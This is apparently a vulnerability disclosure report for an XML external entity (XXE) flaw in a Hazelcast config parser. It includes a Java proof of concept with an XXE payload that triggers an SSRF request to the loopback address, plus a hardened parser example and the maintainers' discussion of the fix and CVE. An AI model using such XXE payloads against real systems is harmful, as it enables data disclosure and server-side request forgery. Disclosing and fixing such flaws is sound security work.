Improper Restriction of XML External Entity Reference in hazelcast/hazelcast
Reported on
Jan 16th 2022
Description
The AbstractXmlConfigRootTagRecognizer() constructor builds a SAXParser from a SAXParserFactory on which FEATURE_SECURE_PROCESSING is never set, allowing for XXE attacks. Excerpt from https://github.com/hazelcast/hazelcast/blob/f373d8e05f0258a8e5e817a46b16ed4e32278bd3/hazelcast/src/main/java/com/hazelcast/internal/config/AbstractXmlConfigRootTagRecognizer.java#L56-L65:
public AbstractXmlConfigRootTagRecognizer(String expectedRootNode) throws Exception {
    this.expectedRootNode = expectedRootNode;
    SAXParserFactory factory = SAXParserFactory.newInstance();
    saxParser = factory.newSAXParser();
}

@Override
public boolean isRecognized(ConfigStream configStream) throws Exception {
    MemberHandler memberHandler = new MemberHandler(expectedRootNode);
    try {
        saxParser.parse(configStream, memberHandler);
    }
Proof of Concept
The key code from above, extracted into a standalone program to show how it can be exploited.
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;
import java.io.ByteArrayInputStream;

public class Poc {
    public static void main(String[] args) {
        try {
            // Document with a DOCTYPE declaring an external entity that points at the loopback address.
            String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
            // Same factory usage as in AbstractXmlConfigRootTagRecognizer: no features restricted.
            SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
            saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes()), new HandlerBase());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
Running this causes an SSRF request to http://127.0.0.1/ when the parser resolves the external entity.
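For contrast, the following is an added example (not code from the Hazelcast project or from the report) of how the same SAXParserFactory can be configured so that a DOCTYPE-carrying document like the PoC above is rejected before any entity is resolved. The class, method names and the two sample documents are constructed for this illustration; the example URL host is a placeholder and nothing is fetched from it.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.Attributes;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

public class HardenedSaxParserExample {

    // Constructed sample: a document whose DOCTYPE declares an external entity.
    // The host is a placeholder; the hardened parser never contacts it.
    private static final String XML_WITH_DOCTYPE =
            "<?xml version=\"1.0\"?>"
            + "<!DOCTYPE foo [<!ENTITY ext SYSTEM \"http://example.invalid/secret\">]>"
            + "<foo>&ext;</foo>";

    // Constructed sample: an ordinary config document with no DOCTYPE.
    private static final String PLAIN_XML =
            "<hazelcast><cluster-name>dev</cluster-name></hazelcast>";

    /** Builds a SAXParser that refuses DTDs and never resolves external entities. */
    public static SAXParser newHardenedSaxParser()
            throws ParserConfigurationException, SAXException {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        // JAXP secure-processing limits (entity expansion count, etc.).
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Reject any DOCTYPE outright; this is the setting that actually stops XXE.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case a DOCTYPE must ever be allowed again.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);
        return factory.newSAXParser();
    }

    /** Returns the root element name, or null when the parser rejects the document. */
    public static String rootElement(SAXParser parser, String xml) {
        final String[] root = new String[1];
        DefaultHandler handler = new DefaultHandler() {
            @Override
            public void startElement(String uri, String localName, String qName, Attributes attrs) {
                if (root[0] == null) {
                    root[0] = qName;
                }
            }
        };
        try {
            parser.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)), handler);
            return root[0];
        } catch (SAXException | IOException e) {
            // The DOCTYPE is reported as a SAXParseException before any network access happens.
            System.out.println("rejected: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        SAXParser hardened = newHardenedSaxParser();
        System.out.println("plain document root: " + rootElement(hardened, PLAIN_XML));
        System.out.println("DOCTYPE document root: " + rootElement(hardened, XML_WITH_DOCTYPE));
    }
}
```

With the JDK's built-in Xerces parser, FEATURE_SECURE_PROCESSING on its own only caps entity expansion; it does not stop the parser from fetching the SYSTEM identifier of an external entity. Setting disallow-doctype-decl is what blocks the PoC document, and the external-entity features are there so that the parser stays safe if the DOCTYPE restriction is ever relaxed.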
Impact
This vulnerability allows XML External Entity (XXE) injection, which can be used to disclose data, conduct SSRF attacks, and similar.
The fix is on the way: https://github.com/hazelcast/hazelcast/pull/20407
Even though the class is not new, the only affected version seems to be the enterprise version of the latest beta (5.1-BETA-1). I didn't find a valid call path (other than ones from tests) in previous releases.
With this PR merged, has this been fixed? If so, we can go ahead and confirm the fix against the report ♥️
The PR is merged and the fix will be included in Hazelcast 5.1. I would like to publish the report after the new version is released. The plan is to have the new version out in February.
Okay, thanks for the update Josef and that makes sense.
We will confirm the fix for this report once you are ready to publish the report!
@jamieslome, how can we change the description of the CVE to explicitly state the vulnerable version (5.1-BETA-1)? It currently says "repository hazelcast/hazelcast prior to 5.1."
@kwart - I have updated the CVE for you 👍
https://github.com/CVEProject/cvelist/pull/5209/files
The description will now reflect the vulnerable version instead of 5.1. Please allow 1 hour for the CVE to update.